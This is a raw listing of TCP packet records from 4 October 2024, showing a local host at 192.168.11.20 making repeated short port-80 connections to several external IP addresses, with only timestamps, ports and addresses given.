                                                                                                                                                    Oct 4, 2024 12:02:26.383475065 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.383706093 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:26.385068893 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:26.486804008 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.487032890 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.487227917 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:27.885884047 CEST4979480192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:27.987582922 CEST804979413.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:28.903264046 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.004734993 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.004918098 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.006437063 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.006459951 CEST4979580192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:29.106969118 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107079029 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107180119 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107192993 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107290983 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107402086 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:29.107412100 CEST804979513.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.527652025 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.630177021 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.630395889 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.631722927 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.733267069 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.734312057 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.734324932 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:31.734635115 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.736532927 CEST4979680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:31.837460995 CEST804979613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:36.745363951 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:37.061331034 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.061454058 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:37.062827110 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:37.373233080 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.373456955 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.373466969 CEST804979743.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:37.373667002 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:38.571053982 CEST4979780192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:39.590071917 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:39.908752918 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:39.908958912 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:39.910324097 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:40.228075027 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:40.228224039 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:40.228235960 CEST804979843.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:40.228351116 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:41.414127111 CEST4979880192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.431479931 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.736562967 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:42.736756086 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.738281012 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:42.738358021 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:43.042120934 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042146921 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042320967 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042331934 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042359114 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042527914 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042541981 CEST804979943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:43.042665958 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:44.241652012 CEST4979980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.259232044 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.570910931 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.571146965 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.572509050 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.882010937 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.882251024 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.882359982 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:45.882627964 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:45.884489059 CEST4980080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 12:02:46.194264889 CEST804980043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:50.898555040 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:51.099401951 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.099610090 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:51.100986004 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:51.305381060 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.900362015 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.905674934 CEST804980131.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:51.905751944 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:52.614861012 CEST4980180192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:53.632155895 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:53.828783989 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:53.828947067 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:53.830348015 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:54.027076006 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:54.850675106 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:54.851078033 CEST804980231.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:54.851294041 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:55.332987070 CEST4980280192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.350353003 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.548943043 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:56.549158096 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.550652981 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.550703049 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:56.749583006 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:56.749593973 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:56.749620914 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:57.664015055 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:57.669387102 CEST804980331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:57.669540882 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:58.066750050 CEST4980380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.084095955 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.280715942 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:59.280927896 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.282289982 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:02:59.478884935 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:01.168243885 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:01.172589064 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:01.172727108 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:03:01.173413038 CEST4980480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 12:03:01.369944096 CEST804980431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:06.176384926 CEST4980580192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:06.276412010 CEST8049805191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:06.276694059 CEST4980580192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:06.278040886 CEST4980580192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:06.378231049 CEST8049805191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:06.873116016 CEST8049805191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:06.873128891 CEST8049805191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:06.873311996 CEST4980580192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:07.783379078 CEST4980580192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:08.803014040 CEST4980680192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:08.902537107 CEST8049806191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:08.902757883 CEST4980680192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:08.904134035 CEST4980680192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:09.004879951 CEST8049806191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:09.004973888 CEST8049806191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:09.004983902 CEST8049806191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:09.005119085 CEST4980680192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:10.407805920 CEST4980680192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:11.425107002 CEST4980780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:11.525124073 CEST8049807191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:11.525319099 CEST4980780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:11.526844025 CEST4980780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:11.526892900 CEST4980780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:11.626585007 CEST8049807191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:11.627345085 CEST8049807191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:11.627356052 CEST8049807191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:11.627366066 CEST8049807191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:11.627523899 CEST4980780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:13.032234907 CEST4980780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.049593925 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.150486946 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.150676966 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.152014017 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.252259016 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.253379107 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.253393888 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.253638983 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.253732920 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.253771067 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.253911018 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.253925085 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.253927946 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:14.254081011 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.256850004 CEST4980880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 12:03:14.356342077 CEST8049808191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:19.267237902 CEST4980980192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:19.380784988 CEST8049809162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:19.380961895 CEST4980980192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:19.382311106 CEST4980980192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:19.496129990 CEST8049809162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:19.496412992 CEST8049809162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:19.496423960 CEST8049809162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:19.496599913 CEST4980980192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:20.889820099 CEST4980980192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:21.907264948 CEST4981080192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:22.020970106 CEST8049810162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:22.021254063 CEST4981080192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:22.022593021 CEST4981080192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:22.136146069 CEST8049810162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:22.136637926 CEST8049810162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:22.136651039 CEST8049810162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:22.136817932 CEST4981080192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:23.529906988 CEST4981080192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:24.547472000 CEST4981180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:24.661561966 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.661768913 CEST4981180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:24.663294077 CEST4981180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:24.663364887 CEST4981180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:24.777863979 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.777993917 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.778007030 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.778121948 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.778285027 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.778299093 CEST8049811162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:24.778448105 CEST4981180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:26.169913054 CEST4981180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:27.187289000 CEST4981280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:27.300637960 CEST8049812162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:27.300818920 CEST4981280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:27.302198887 CEST4981280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:27.415796041 CEST8049812162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:27.416059017 CEST8049812162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:27.416071892 CEST8049812162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:27.416312933 CEST4981280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:27.418246984 CEST4981280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:03:27.531555891 CEST8049812162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:48.902255058 CEST4981380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:49.083993912 CEST804981391.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:49.084099054 CEST4981380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:49.085659981 CEST4981380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:49.267256021 CEST804981391.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:49.267270088 CEST804981391.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:49.267450094 CEST4981380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:50.586471081 CEST4981380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:51.603856087 CEST4981480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:51.785093069 CEST804981491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:51.785248995 CEST4981480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:51.786623001 CEST4981480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:51.968463898 CEST804981491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:51.968477011 CEST804981491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:51.968739986 CEST4981480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:53.289025068 CEST4981480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:54.306389093 CEST4981580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:54.487783909 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:54.487956047 CEST4981580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:54.489429951 CEST4981580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:54.489484072 CEST4981580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:54.671190977 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:54.671202898 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:54.671410084 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:54.671418905 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:54.671426058 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:54.671483040 CEST804981591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:57.008897066 CEST4981680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:57.190577030 CEST804981691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:57.190772057 CEST4981680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:57.192121029 CEST4981680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:57.373759985 CEST804981691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:57.373842955 CEST804981691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:03:57.373970985 CEST4981680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:57.375855923 CEST4981680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:03:57.557051897 CEST804981691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:39.874618053 CEST4982680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:04:40.061196089 CEST804982691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:40.061420918 CEST4982680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:04:40.062792063 CEST4982680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:04:40.249202013 CEST804982691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:40.249216080 CEST804982691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:40.249444962 CEST4982680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:04:40.251337051 CEST4982680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:04:40.437340975 CEST804982691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.264133930 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.455081940 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.455286980 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.456777096 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.647752047 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.647903919 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.648313999 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.648425102 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.648504972 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.648520947 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.648566008 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:45.648699045 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.648699045 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.652147055 CEST4982780192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:04:45.843198061 CEST8049827185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.669504881 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.769311905 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.769515038 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.770885944 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.870632887 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872040033 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872102976 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872132063 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872231960 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872276068 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872277021 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.872288942 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872301102 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872369051 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.872457027 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872486115 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.872495890 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872510910 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:50.872587919 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.872814894 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.874705076 CEST4982880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:04:50.975059986 CEST8049828184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.167608023 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.358145952 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.358345032 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.359771967 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.544938087 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557590008 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557605028 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557689905 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.557703972 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558078051 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558078051 CEST4982980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:04:57.558135033 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558149099 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558245897 CEST8049829199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:04:57.558377981 CEST8049829199.192.19.19192.168.11.20
